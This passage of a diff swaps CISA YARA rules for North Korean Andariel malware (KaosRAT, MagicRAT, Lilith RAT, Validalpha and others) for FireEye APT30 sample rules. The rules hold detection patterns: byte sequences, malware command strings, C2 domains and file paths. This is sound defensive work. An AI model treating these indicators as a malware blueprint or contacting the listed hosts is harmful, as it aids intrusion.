-		$obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }
-		$obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }
+		$s0 = "\\~zlzl.exe" ascii
+		$s2 = "\\Internet Exp1orer" ascii
+		$s3 = "NodAndKabIsExcellent" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Kaosrat_Yamabot
+rule SIGNATURE_BASE_APT30_Sample_23 : FILE
 {
 	meta:
-		description = "Detects the KaosRAT variant"
-		author = "CISA.gov"
-		id = "cdde69cd-1b38-52f5-8552-cef2cf4ad69c"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L20-L42"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9366dd34-9967-5b40-935e-4b0d8f2f5e9e"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L617-L637"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "92182aac2e56041292102b0486b7de1ee6eb3d54a9fc6786c567acd92073cd84"
-		score = 70
+		hash = "9865e24aadb4480bd3c182e50e0e53316546fc01"
+		logic_hash = "64ff048b061431e0834ac40bfccb0d9e8ca60ffb022578ef910e6ffc511be6ed"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str1 = "/kaos/"
-		$str2 = "Abstand ["
-		$str3 = "] anwenden"
-		$str4 = "cmVjYXB0Y2hh"
-		$str5 = "/bin/sh"
-		$str6 = "utilities.CIpaddress"
-		$str7 = "engine.NewEgg"
-		$str8 = "%s%04x%s%s%s"
-		$str9 = "Y2FwdGNoYV9zZXNzaW9u"
-		$str10 = "utilities.EierKochen"
-		$str11 = "kandidatKaufhaus"
+		$s0 = "hostid" ascii
+		$s1 = "\\Window" ascii
+		$s2 = "%u:%u%s" fullword ascii
+		$s5 = "S2tware\\Mic" ascii
+		$s6 = "la/4.0 (compa" ascii
+		$s7 = "NameACKernel" fullword ascii
+		$s12 = "ToWideChc[lo" fullword ascii
+		$s14 = "help32SnapshotfL" ascii
 
 	condition:
-		3 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Trifaux_Easyrat_JUPITER : FILE
+rule SIGNATURE_BASE_APT30_Sample_24 : FILE
 {
 	meta:
-		description = "Detects a variant of the EasyRAT malware family"
-		author = "CISA.gov"
-		id = "8bd72287-59da-53cf-9015-66149303e59f"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L44-L59"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aed2201d-b557-56ec-aa53-fff5b1e17dbd"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L639-L658"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6108035dbebd34fe994fc1f8b4123321321f6ed5c022be6e84a88f905ea6fb73"
-		score = 80
+		hash = "572caa09f2b600daa941c60db1fc410bef8d1771"
+		logic_hash = "9d550fd0225f1c4e3b16ae53648644d7bb5c80e99e2a1a3d199e51c7219c2e94"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$InitOnce = "InitOnceExecuteOnce"
-		$BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }
-		$Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide
+		$s1 = "dizhi.gif" fullword ascii
+		$s3 = "Mozilla/4.0" fullword ascii
+		$s4 = "lyeagles" fullword ascii
+		$s6 = "HHOSTR" ascii
+		$s7 = "#MicrosoftHaveAck7" ascii
+		$s8 = "iexplore." fullword ascii
+		$s17 = "ModuleH" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Cutiedrop_Magicrat : FILE
+rule SIGNATURE_BASE_APT30_Sample_25 : FILE
 {
 	meta:
-		description = "Detects the MagicRAT variant used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "104244de-83fb-5112-a2b6-e20d38a6ced6"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L61-L85"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8b2f2ba2-e9cc-5b3c-8af9-4217d662bc3f"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L660-L679"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f289bbd71bdeaf2c42063642454679ec26de5ed24c020af40db694a0ced54884"
-		score = 80
+		hash = "44a21c8b3147fabc668fee968b62783aa9d90351"
+		logic_hash = "86945188f888762ae585463df7cfb6e5fed30d0fcfcca4e642aedf07a0193ae7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$config_os_w = "os/windows" ascii
-		$config_os_l = "os/linux" ascii
-		$config_os_m = "os/mac" ascii
-		$config_comp_msft = "company/microsoft" ascii
-		$config_comp_orcl = "company/oracle" ascii
-		$POST_field_1 = "session=" ascii
-		$POST_field_2 = "type=" ascii
-		$command_misspelled = "renmae" ascii
+		$s1 = "C:\\WINDOWS" fullword ascii
+		$s2 = "aragua" fullword ascii
+		$s4 = "\\driver32\\7$" ascii
+		$s8 = "System V" fullword ascii
+		$s9 = "Compu~r" fullword ascii
+		$s10 = "PROGRAM L" fullword ascii
+		$s18 = "GPRTMAX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_HHSD_Filetransfertool : FILE
+rule SIGNATURE_BASE_APT30_Sample_26 : FILE
 {
 	meta:
-		description = "Detects a variant of the HHSD File Transfer Tool"
-		author = "CISA.gov"
-		id = "46b6dbaf-1272-5bbd-a586-5e48ba6c5022"
-		date = "2024-07-25"
-		modified = "2025-07-09"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L87-L125"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aa80a142-c8fc-504e-b475-e9838607bec6"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L681-L700"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "665c1b27d64d5377be98aa4e629b077e56f3a44273d98653a338439b3dc05b65"
-		score = 70
+		hash = "e26588113417bf68cb0c479638c9cd99a48e846d"
+		logic_hash = "b585687c071dc2dddb888906f47b7af6bc7683e902d3afb42364896e800fac5c"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }
-		$err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }
-		$hash_call_loadlib = { B? 8D 10 B7 F8 E8 }
-		$hash_call_unk = { B? 91 B8 F6 88 E8 }
+		$s1 = "forcegue" fullword ascii
+		$s3 = "Windows\\Cur" fullword ascii
+		$s4 = "System Id" fullword ascii
+		$s5 = "Software\\Mic" fullword ascii
+		$s6 = "utiBy0ToWideCh&$a" fullword ascii
+		$s10 = "ModuleH" fullword ascii
+		$s15 = "PeekNamed6G" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $handshake , $err_xor_str ) and 1 of ( $hash_call_* ) or 2 of ( $handshake , $err_xor_str )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Atharvan_3RAT : FILE
+rule SIGNATURE_BASE_APT30_Generic_D : FILE
 {
 	meta:
-		description = "Detects a variant of the Atharvan 3RAT malware family"
-		author = "CISA.gov"
-		id = "9ff6998a-a2dd-5671-bd3f-ee69561f71ef"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L127-L141"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b8d8a60-a357-5cfd-8ff1-6264144ad7be"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L702-L725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "741318234e245a35accc0b102a7891559ce5ef868ccdc3e6e4c8e59d8dea8b24"
-		score = 80
+		logic_hash = "ff39fc7643441652ec0cdf2f84c7827d326ddb5f01451b3857cfc4015eb01467"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "35dfb55f419f476a54241f46e624a1a4"
+		hash2 = "4fffcbdd4804f6952e0daf2d67507946"
+		hash3 = "597805832d45d522c4882f21db800ecf"
+		hash4 = "6bd422d56e85024e67cc12207e330984"
+		hash5 = "82e13f3031130bd9d567c46a9c71ef2b"
+		hash6 = "b79d87ff6de654130da95c73f66c15fa"
 
 	strings:
-		$3RAT = "D:\\rang\\TOOL\\3RAT"
-		$atharvan = "Atharvan_dll.pdb"
+		$s0 = "Windows Security Service Feedback" fullword wide
+		$s1 = "wssfmgr.exe" fullword wide
+		$s2 = "\\rb.htm" ascii
+		$s3 = "rb.htm" fullword ascii
+		$s4 = "cook5" ascii
+		$s5 = "5, 4, 2600, 0" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Lilithrat_Variant : FILE
+rule SIGNATURE_BASE_APT30_Sample_27 : FILE
 {
 	meta:
-		description = "Detects a variant of the Lilith RAT malware family"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "916a289b-db7b-5f09-9d3e-589c3f09101d"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L143-L178"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "22815745-086f-59ee-aac1-f35e49aa5835"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L727-L746"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3ce68908468ff85683b081842fa4faa579fbf6f7dc1a7fab5dcf7eac63d90aea"
-		score = 80
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$lilith_1 = "Initiate a CMD session first." ascii
-		$lilith_2 = "CMD is not open" ascii
-		$lilith_3 = "Couldn't write command" ascii
-		$lilith_4 = "Couldn't write to CMD: CMD not open" ascii
-		$unique_1 = "Upload Error!" ascii
-		$unique_2 = "ERROR: Downloading is already running!" ascii
-		$unique_3 = "ERROR: Unable to open file:" ascii
-		$unique_4 = "General error" ascii
-		$unique_5 = "CMD error" ascii
-		$unique_6 = "killing self" ascii
+		hash = "959573261ca1d7e5ddcd19447475b2139ca24fe1"
+		logic_hash = "5ef0661c5c04f0f0923548509363971011194a16e4308fcfdea5db90e85518a4"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "Mozilla/4.0" fullword ascii
+		$s1 = "dizhi.gif" fullword ascii
+		$s5 = "oftHaveAck+" ascii
+		$s10 = "HlobalAl" fullword ascii
+		$s13 = "$NtRND1$" fullword ascii
+		$s14 = "_NStartup" ascii
+		$s16 = "GXSYSTEM" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $lilith_* ) or 4 of ( $unique_* ) or 1 of ( $lilith_4 , $unique_2 ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Sockstroy_Strings_Opcodes : FILE
+rule SIGNATURE_BASE_APT30_Sample_28 : FILE
 {
 	meta:
-		description = "Detects a variant of the SocksTroy malware family"
-		author = "CISA.gov"
-		id = "9e7fb6ba-771e-5cae-a0d5-c0b95ee6d4e9"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L180-L199"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1bc8c68f-ebbb-58b1-92aa-5954318096a0"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L748-L776"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ab31b285d0dba1745a2d8b172bd02931c6138e2b8e541203b88f111d179549b"
-		score = 80
+		logic_hash = "d246a188ad9ec69948bef6018bab1e7a244c76dcf511c3f9d16024ef7e369ae2"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e62a63307deead5c9fcca6b9a2d51fb0"
+		hash2 = "5b590798da581c894d8a87964763aa8b"
 
 	strings:
-		$strHost = "-host" wide
-		$strAuth = "-auth" wide
-		$SocksTroy = "SocksTroy"
-		$cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }
+		$s0 = "www.flyeagles.com" fullword ascii
+		$s1 = "iexplore.exe" fullword ascii
+		$s2 = "www.km-nyc.com" fullword ascii
+		$s3 = "cmdLine.exe" fullword ascii
+		$s4 = "Software\\Microsoft\\CurrentNetInf" fullword ascii
+		$s5 = "/dizhi.gif" ascii
+		$s6 = "/connect.gif" ascii
+		$s7 = "USBTest.sys" fullword ascii
+		$s8 = "/ver.htm" fullword ascii
+		$s11 = "\\netscv.exe" ascii
+		$s12 = "/app.htm" fullword ascii
+		$s13 = "\\netsvc.exe" ascii
+		$s14 = "/exe.htm" fullword ascii
+		$s18 = "MicrosoftHaveAck" fullword ascii
+		$s19 = "MicrosoftHaveExit" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $str* ) and all of ( $c* ) or all of ( $Socks* ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Agni : FILE
+rule SIGNATURE_BASE_APT30_Sample_29 : FILE
 {
 	meta:
-		description = "Detects samples of the Agni malware family"
-		author = "CISA.gov"
-		id = "ffe3f427-c10a-5ad4-ab29-c0d9b576c30f"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L201-L216"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24334885-fcb4-5a13-82e8-c8465f97361e"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L778-L798"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "302899b65e5a3a6beabbb46e80e3f0ff246c209206cc3a7f871011d68871d0b9"
-		score = 80
+		hash = "44492c53715d7c79895904543843a321491cb23a"
+		logic_hash = "7a59118ba00413961e6fc4d54680373d033a38d698613f853f67137b85c123a7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }
-		$stackstrings = { C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24 }
+		$s0 = "LSSAS.exe" fullword ascii
+		$s1 = "Software\\Microsoft\\FlashDiskInf" fullword ascii
+		$s2 = ".petite" fullword ascii
+		$s3 = "MicrosoftFlashExit" fullword ascii
+		$s4 = "MicrosoftFlashHaveExit" fullword ascii
+		$s5 = "MicrosoftFlashHaveAck" fullword ascii
+		$s6 = "\\driver32" ascii
+		$s7 = "MicrosoftFlashZJ" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and #xor > 100 and #stackstrings > 5
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Handshake
+rule SIGNATURE_BASE_APT30_Sample_30 : FILE
 {
 	meta:
-		description = "Detects a variant of the GoLang Validalpha malware"
-		author = "CISA.gov"
-		id = "51dafa43-9da0-569a-9123-7e9800284046"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L218-L230"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "787b288a-6fb4-5483-af76-933651ec6d58"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L800-L817"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1978210d07d3298c0051c9faca16685636e3fb45131b4c2fcb7053a0b3ef84d1"
+		hash = "3b684fa40b4f096e99fbf535962c7da5cf0b4528"
+		logic_hash = "5ecfc8d53b768f624c8765f70708bfaae5396d7aa6b0335f7c656f4350649c5d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }
+		$s0 = "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" fullword wide
+		$s3 = "RnhwtxtkyLRRMf{jJ}ny" fullword ascii
+		$s4 = "RnhwtxtkyLRRJ}ny" fullword ascii
+		$s5 = "ZRLDownloadToFileA" fullword ascii
+		$s9 = "5.1.2600.2180" fullword wide
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Tasks
+rule SIGNATURE_BASE_APT30_Sample_31 : FILE
 {
 	meta:
-		description = "Detects a variant of the GoLang Validalpha malware"
-		author = "CISA.gov"
-		id = "caa67a79-3ea6-5910-971c-f311722570ff"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L232-L247"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9333870b-7eaa-54dd-a801-7292708fb592"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L819-L836"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d3fb944888b289d345ffc8dfcc988abd04b8cabd1729a66e8236f95ee6147ee"
-		score = 80
-		quality = 85
-		tags = ""
+		hash = "8b4271167655787be1988574446125eae5043aca"
+		logic_hash = "003bfa9774d3e85829cc266d06417b86287986994995adfa7a2bd26c3648c07e"
+		score = 75
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "main.ScreenMonitThread"
-		$ = "main.CmdShell"
-		$ = "main.GetAllFoldersAndFiles"
-		$ = "main.SelfDelete"
+		$s0 = "\\ZJRsv.tem" ascii
+		$s1 = "forceguest" fullword ascii
+		$s4 = "\\$NtUninstallKB570317$" ascii
+		$s8 = "[Can'tGetIP]" fullword ascii
+		$s14 = "QWERTY:,`/" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Blackstring : FILE
+rule SIGNATURE_BASE_APT30_Generic_J : FILE
 {
 	meta:
-		description = "Detects a variant of the GoLang Validalpha malware based on a file path found in the samples"
-		author = "CISA.gov"
-		id = "36f46a1d-69b6-5c99-9a54-6a14d62d2721"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L249-L261"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "64a5106e-d7f3-5c68-a14e-410149a1bb9e"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L838-L869"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "07ea38890e99dd53437a23b7c4002851604b69a83bd7fb8971609226249e5954"
-		score = 90
+		logic_hash = "7c404689b60fe493ca9b503902173ac04d7bb00488edec9e69006e6d51e20c51"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49aca228674651cba776be727bdb7e60"
+		hash2 = "5c7a6b3d1b85fad17333e02608844703"
+		hash3 = "649fa64127fef1305ba141dd58fb83a5"
+		hash4 = "9982fd829c0048c8f89620691316763a"
+		hash5 = "baff5262ae01a9217b10fcd5dad9d1d5"
+		hash6 = "9982fd829c0048c8f89620691316763a"
 
 	strings:
-		$ = "I:/01___Tools/02__RAT/Black"
+		$s0 = "Launcher.EXE" fullword wide
+		$s1 = "Symantec Security Technologies" fullword wide
+		$s2 = "\\Symantec LiveUpdate.lnk" ascii
+		$s3 = "Symantec Service Framework" fullword wide
+		$s4 = "\\ccSvcHst.exe" ascii
+		$s5 = "\\wssfmgr.exe" ascii
+		$s6 = "Symantec Corporation" fullword wide
+		$s7 = "\\5.1.0.29" ascii
+		$s8 = "\\Engine" ascii
+		$s9 = "Copyright (C) 2000-2010 Symantec Corporation. All rights reserved." fullword wide
+		$s10 = "Symantec LiveUpdate" fullword ascii
+		$s11 = "\\Norton360" ascii
+		$s15 = "BinRes" fullword ascii
+		$s16 = "\\readme.lz" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_ELF_Backdoor_Fipps : FILE
+rule SIGNATURE_BASE_APT30_Microfost : FILE
 {
 	meta:
-		description = "Detects a Linux backdoor named Fipps used by Andariel"
-		author = "CISA.gov"
-		id = "040bca78-8b7e-5397-8a2b-1ddeed59eea3"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L291-L307"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19231001-1da3-5be6-8275-03c9fc7c6377"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L871-L885"
